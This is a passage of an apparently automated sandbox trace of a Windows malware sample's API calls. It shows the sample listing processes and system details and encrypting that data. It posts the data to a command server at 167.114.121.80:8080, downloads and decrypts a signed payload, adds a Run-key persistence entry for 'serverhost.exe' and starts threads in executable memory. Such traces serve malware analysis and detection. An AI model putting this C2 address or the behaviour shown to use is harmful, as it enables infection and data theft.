merchandise.exe,blowiranlaboratorydisaster.exe,taskeng.exe,explorer.exe,dwm.exe,taskhost.exe,spoolsv.exe,audiodg.exe,svchost.exe,lsm.exe,lsass.exe,services.exe,winlogon.exe,wininit.exe,csrss.exe,smss.exe,System,[System Process],", cchWideChar=710, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 710 [0081.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSPPSVC.EXE,WINWORD.EXE,nerve-bracelet.exe,lease-entitled-pcs.exe,lighter.exe,distributors.exe,advocate-keep.exe,irish.exe,fifth roller.exe,evanescence oscar em.exe,remained universe sole.exe,panel-maria-suggestion.exe,invalid.exe,myers biggest qatar.exe,info-began-nobody-tops.exe,chargetrackbacksobserve.exe,designed.exe,food_logos_lot.exe,enterprise monsters comments.exe,involved-int-antenna-lol.exe,lyrics-morning-effectiveness.exe,bookings.exe,output.exe,argentina conducting merchandise.exe,blowiranlaboratorydisaster.exe,taskeng.exe,explorer.exe,dwm.exe,taskhost.exe,spoolsv.exe,audiodg.exe,svchost.exe,lsm.exe,lsass.exe,services.exe,winlogon.exe,wininit.exe,csrss.exe,smss.exe,System,[System Process],", cchWideChar=710, lpMultiByteStr=0x4a7f10, cbMultiByte=710, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OSPPSVC.EXE,WINWORD.EXE,nerve-bracelet.exe,lease-entitled-pcs.exe,lighter.exe,distributors.exe,advocate-keep.exe,irish.exe,fifth roller.exe,evanescence oscar em.exe,remained universe sole.exe,panel-maria-suggestion.exe,invalid.exe,myers biggest qatar.exe,info-began-nobody-tops.exe,chargetrackbacksobserve.exe,designed.exe,food_logos_lot.exe,enterprise monsters comments.exe,involved-int-antenna-lol.exe,lyrics-morning-effectiveness.exe,bookings.exe,output.exe,argentina conducting merchandise.exe,blowiranlaboratorydisaster.exe,taskeng.exe,explorer.exe,dwm.exe,taskhost.exe,spoolsv.exe,audiodg.exe,svchost.exe,lsm.exe,lsass.exe,services.exe,winlogon.exe,wininit.exe,csrss.exe,smss.exe,System,[System Process],", lpUsedDefaultChar=0x0) returned 710 [0081.626] RtlGetVersion (in: lpVersionInformation=0x1a9f960 | out: lpVersionInformation=0x1a9f960*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 0x0 [0081.626] GetNativeSystemInfo (in: lpSystemInfo=0x1a9fa7c | out: lpSystemInfo=0x1a9fa7c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0081.626] lstrlenA (lpString="F71GWAT_78B95E2E") returned 16 [0081.629] CryptDuplicateHash (in: hHash=0x4a16d8, pdwReserved=0x0, dwFlags=0x0, phHash=0x1a9f994 | out: phHash=0x1a9f994) returned 1 [0081.629] CryptEncrypt (in: hKey=0x4a1408, hHash=0x4a8818, Final=1, dwFlags=0x0, pbData=0x4a8614*, pdwDataLen=0x1a9f97c*=0x1d2, dwBufLen=0x1e0 | out: pbData=0x4a8614*, pdwDataLen=0x1a9f97c*=0x1e0) returned 1 [0081.629] CryptExportKey (in: hKey=0x4a1408, hExpKey=0x4a12b0, dwBlobType=0x1, dwFlags=0x40, pbData=0x1a9f910, pdwDataLen=0x1a9f980 | out: pbData=0x1a9f910*, pdwDataLen=0x1a9f980*=0x6c) returned 1 [0081.629] CryptGetHashParam (in: hHash=0x4a8818, dwParam=0x2, pbData=0x4a8600, pdwDataLen=0x1a9f980, dwFlags=0x0 | out: pbData=0x4a8600, pdwDataLen=0x1a9f980) returned 1 [0081.629] CryptDestroyHash (hHash=0x4a8818) returned 1 [0081.629] _snwprintf (in: _Dest=0x1a9f9a8, _Count=0x40, _Format="%u.%u.%u.%u" | out: _Dest="167.114.121.80") returned 14 [0081.629] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0x1a9f784, cbSize=0x1a9f984 | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)", cbSize=0x1a9f984) returned 0x0 [0081.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1a9f784, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 184 [0081.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1a9f784, cbMultiByte=-1, lpWideCharStr=0x4a9d38, cchWideChar=184 | out: lpWideCharStr="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)") returned 184 [0081.632] InternetOpenW (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0081.667] InternetConnectW (hInternet=0xcc0004, lpszServerName="167.114.121.80", nServerPort=0x1f90, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0081.670] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName=0x0, lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x844cc300, dwContext=0x0) returned 0xcc000c [0081.671] HttpSendRequestW (in: hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0xffffffff, lpOptional=0x4a85a0*, dwOptionalLength=0x254 | out: lpOptional=0x4a85a0*) returned 1 [0082.452] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x1a9fa70, lpdwBufferLength=0x1a9f990, lpdwIndex=0x0 | out: lpBuffer=0x1a9fa70*, lpdwBufferLength=0x1a9f990*=0x4, lpdwIndex=0x0) returned 1 [0082.452] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000005, lpBuffer=0x1a9f980, lpdwBufferLength=0x1a9f988, lpdwIndex=0x0 | out: lpBuffer=0x1a9f980*, lpdwBufferLength=0x1a9f988*=0x4, lpdwIndex=0x0) returned 1 [0082.453] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4dabb8, dwNumberOfBytesToRead=0x6c724, lpdwNumberOfBytesRead=0x1a9f984 | out: lpBuffer=0x4dabb8*, lpdwNumberOfBytesRead=0x1a9f984*=0x6c724) returned 1 [0083.126] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5472dc, dwNumberOfBytesToRead=0x0, lpdwNumberOfBytesRead=0x1a9f984 | out: lpBuffer=0x5472dc*, lpdwNumberOfBytesRead=0x1a9f984*=0x0) returned 1 [0083.127] CryptDuplicateHash (in: hHash=0x4a16d8, pdwReserved=0x0, dwFlags=0x0, phHash=0x1a9f988 | out: phHash=0x1a9f988) returned 1 [0083.128] CryptDecrypt (in: hKey=0x4a1408, hHash=0x4a8c98, Final=1, dwFlags=0x0, pbData=0x2010048, pdwDataLen=0x1a9fa80 | out: pbData=0x2010048, pdwDataLen=0x1a9fa80) returned 1 [0083.132] CryptVerifySignatureW (hHash=0x4a8c98, pbSignature=0x4dabb8, dwSigLen=0x60, hPubKey=0x4a12b0, szDescription=0x0, dwFlags=0x0) returned 1 [0083.132] CryptDestroyHash (hHash=0x4a8c98) returned 1 [0083.151] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0083.151] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0083.151] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0083.151] _snwprintf (in: _Dest=0x1a9f88c, _Count=0x104, _Format="\"%s\"" | out: _Dest="\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\"") returned 73 [0083.151] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x1a9fa94, lpdwDisposition=0x0 | out: phkResult=0x1a9fa94*=0x384, lpdwDisposition=0x0) returned 0x0 [0083.151] RegSetValueExW (in: hKey=0x384, lpValueName="serverhost", Reserved=0x0, dwType=0x1, lpData="\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\"", cbData=0x94 | out: lpData="\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\"") returned 0x0 [0083.151] RegCloseKey (hKey=0x384) returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.152] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.153] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.154] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.155] GetLastError () returned 0x0 [0083.156] GetLastError () returned 0x0 [0083.156] GetLastError () returned 0x0 [0083.156] GetLastError () returned 0x0 [0083.156] GetLastError () returned 0x0 [0083.156] GetLastError () returned 0x0 [0083.156] GetLastError () returned 0x0 [0083.156] GetLastError () returned 0x0 [0083.156] GetLastError () returned 0x0 [0083.156] GetLastError () returned 0x0 [0083.156] GetLastError () returned 0x0 [0083.156] GetLastError () returned 0x0 [0083.156] GetLastError () returned 0x0 [0083.156] GetLastError () returned 0x0 [0083.156] GetLastError () returned 0x0 [0083.156] GetLastError () returned 0x0 [0083.156] GetLastError () returned 0x0 [0083.156] GetLastError () returned 0x0 [0083.156] GetLastError () returned 0x0 [0083.156] GetLastError () returned 0x0 [0083.156] GetLastError () returned 0x0 [0083.156] GetLastError () returned 0x0 [0083.156] GetLastError () returned 0x0 [0083.156] GetLastError () returned 0x0 [0083.156] GetLastError () returned 0x0 [0083.156] GetLastError () returned 0x0 [0083.156] GetLastError () returned 0x0 [0083.156] GetLastError () returned 0x0 [0083.156] GetLastError () returned 0x0 [0083.156] GetLastError () returned 0x0 [0083.156] GetLastError () returned 0x0 [0083.311] VirtualAlloc (lpAddress=0x0, dwSize=0x26000, flAllocationType=0x3000, flProtect=0x40) returned 0x1cf0000 [0083.315] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x457f73, lpParameter=0x4c3610, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x384 [0083.315] VirtualAlloc (lpAddress=0x0, dwSize=0x63000, flAllocationType=0x3000, flProtect=0x40) returned 0x1d30000 [0083.318] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x457f73, lpParameter=0x4c3670, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x388 [0083.319] VirtualAlloc (lpAddress=0x0, dwSize=0x20000, flAllocationType=0x3000, flProtect=0x40) returned 0x1fb0000 [0083.321] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x457f73, lpParameter=0x4c36b0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x38c [0083.321] VirtualAlloc (lpAddress=0x0, dwSize=0x7000, flAllocationType=0x3000, flProtect=0x40) returned 0x1cd0000 [0083.323] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x457f73, lpParameter=0x4c36f0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x390 [0083.451] CryptDuplicateHash (in: hHash=0x4a16d8, pdwReserved=0x0, dwFlags=0x0, phHash=0x1a9f994 | out: phHash=0x1a9f994) returned 1 [0083.451] CryptEncrypt (in: hKey=0x4a1408, hHash=0x4a8dd8, Final=1, dwFlags=0x0, pbData=0x4b0794*, pdwDataLen=0x1a9f97c*=0x1df, dwBufLen=0x1e0 | out: pbData=0x4b0794*, pdwDataLen=0x1a9f97c*=0x1e0) returned 1 [0083.451] CryptExportKey (in: hKey=0x4a1408, hExpKey=0x4a12b0, dwBlobType=0x1, dwFlags=0x40, pbData=0x1a9f910, pdwDataLen=0x1a9f980 | out: pbData=0x1a9f910*, pdwDataLen=0x1a9f980*=0x6c) returned 1 [0083.451] CryptGetHashParam (in: hHash=0x4a8dd8, dwParam=0x2, pbData=0x4b0780, pdwDataLen=0x1a9f980, dwFlags=0x0 | out: pbData=0x4b0780, pdwDataLen=0x1a9f980) returned 1 [0083.451] CryptDestroyHash (hHash=0x4a8dd8) returned 1 [0083.451] _snwprintf (in: _Dest=0x1a9f9a8, _Count=0x40, _Format="%u.%u.%u.%u" | out: _Dest="167.114.121.80") returned 14 [0083.452] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0x1a9f784, cbSize=0x1a9f984 | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)", cbSize=0x1a9f984) returned 0x0 [0083.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1a9f784, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 184 [0083.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1a9f784, cbMultiByte=-1, lpWideCharStr=0x4b0980, cchWideChar=184 | out: lpWideCharStr="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)") returned 184 [0083.452] InternetOpenW (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0083.452] InternetConnectW (hInternet=0xcc0004, lpszServerName="167.114.121.80", nServerPort=0x1f90, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0083.452] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName=0x0, lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x844cc300, dwContext=0x0) returned 0xcc000c [0083.452] HttpSendRequestW (in: hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0xffffffff, lpOptional=0x4b0720*, dwOptionalLength=0x254 | out: lpOptional=0x4b0720*) returned 1 [0083.850] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x1a9fa70, lpdwBufferLength=0x1a9f990, lpdwIndex=0x0 | out: lpBuffer=0x1a9fa70*, lpdwBufferLength=0x1a9f990*=0x4, lpdwIndex=0x0) returned 1 [0083.850] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000005, lpBuffer=0x1a9f980, lpdwBufferLength=0x1a9f988, lpdwIndex=0x0 | out: lpBuffer=0x1a9f980*, lpdwBufferLength=0x1a9f988*=0x4, lpdwIndex=0x0) returned 1 [0083.850] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4cc388, dwNumberOfBytesToRead=0x94, lpdwNumberOfBytesRead=0x1a9f984 | out: lpBuffer=0x4cc388*, lpdwNumberOfBytesRead=0x1a9f984*=0x94) returned 1 [0083.850] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4cc41c, dwNumberOfBytesToRead=0x0, lpdwNumberOfBytesRead=0x1a9f984 | out: lpBuffer=0x4cc41c*, lpdwNumberOfBytesRead=0x1a9f984*=0x0) returned 1 [0083.850] CryptDuplicateHash (in: hHash=0x4a16d8, pdwReserved=0x0, dwFlags=0x0, phHash=0x1a9f988 | out: phHash=0x1a9f988) returned 1 [0083.850] CryptDecrypt (in: hKey=0x4a1408, hHash=0x4a8e18, Final=1, dwFlags=0x0, pbData=0x4d9750, pdwDataLen=0x1a9fa80 | out: pbData=0x4d9750, pdwDataLen=0x1a9fa80) returned 1 [0083.850] CryptVerifySignatureW (hHash=0x4a8e18, pbSignature=0x4cc388, dwSigLen=0x60, hPubKey=0x4a12b0, szDescription=0x0, dwFlags=0x0) returned 1 [0083.850] CryptDestroyHash (hHash=0x4a8e18) returned 1 [0083.850] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0083.850] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0083.850] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0083.851] _snwprintf (in: _Dest=0x1a9f88c, _Count=0x104, _Format="\"%s\"" | out: _Dest="\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\"") returned 73 [0083.851] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x1a9fa94, lpdwDisposition=0x0 | out: phkResult=0x1a9fa94*=0x3cc, lpdwDisposition=0x0) returned 0x0 [0083.851] RegSetValueExW (in: hKey=0x3cc, lpValueName="serverhost", Reserved=0x0, dwType=0x1, lpData="\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\"", cbData=0x94 | out: lpData="\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\"") returned 0x0 [0083.851] RegCloseKey (hKey=0x3cc) returned 0x0 [0083.851] WaitForSingleObject (hHandle=0x390, dwMilliseconds=0x0) returned 0x102 [0083.851] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x0) returned 0x102 [0083.851] WaitForSingleObject (hHandle=0x388, dwMilliseconds=0x0) returned 0x102 [0083.851] WaitForSingleObject (hHandle=0x384, dwMilliseconds=0x0) returned 0x102 [0083.851] GetLastError () returned 0x0 [0083.851] GetLastError () returned 0x0 [0083.851] GetLastError () returned 0x0 [0083.851] GetLastError () returned 0x0 [0083.851] GetLastError () returned 0x0 [0083.851] GetLastError () returned 0x0 [0083.851] GetLastError () returned 0x0 [0083.851] GetLastError () returned 0x0 [0083.851] GetLastError () returned 0x0 [0083.851] GetLastError () returned 0x0 [0083.851] GetLastError () returned 0x0 [0083.851] GetLastError () returned 0x0 [0083.851] GetLastError () returned 0x0 [0083.851] GetLastError () returned 0x0 [0083.851] GetLastError () returned 0x0 [0083.851] GetLastError () returned 0x0 [0083.851] GetLastError () returned 0x0 [0083.851] GetLastError () returned 0x0 [0083.851] GetLastError () returned 0x0 [0083.851] GetLastError () returned 0x0 [0083.851] GetLastError () returned 0x0 [0083.851] GetLastError () returned 0x0 [0083.851] GetLastError () returned 0x0 [0083.851] GetLastError () returned 0x0 [0083.851] GetLastError () returned 0x0 [0083.851] GetLastError () returned 0x0 [0083.851] GetLastError () returned 0x0 [0083.851] GetLastError () returned 0x0 [0083.851] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] 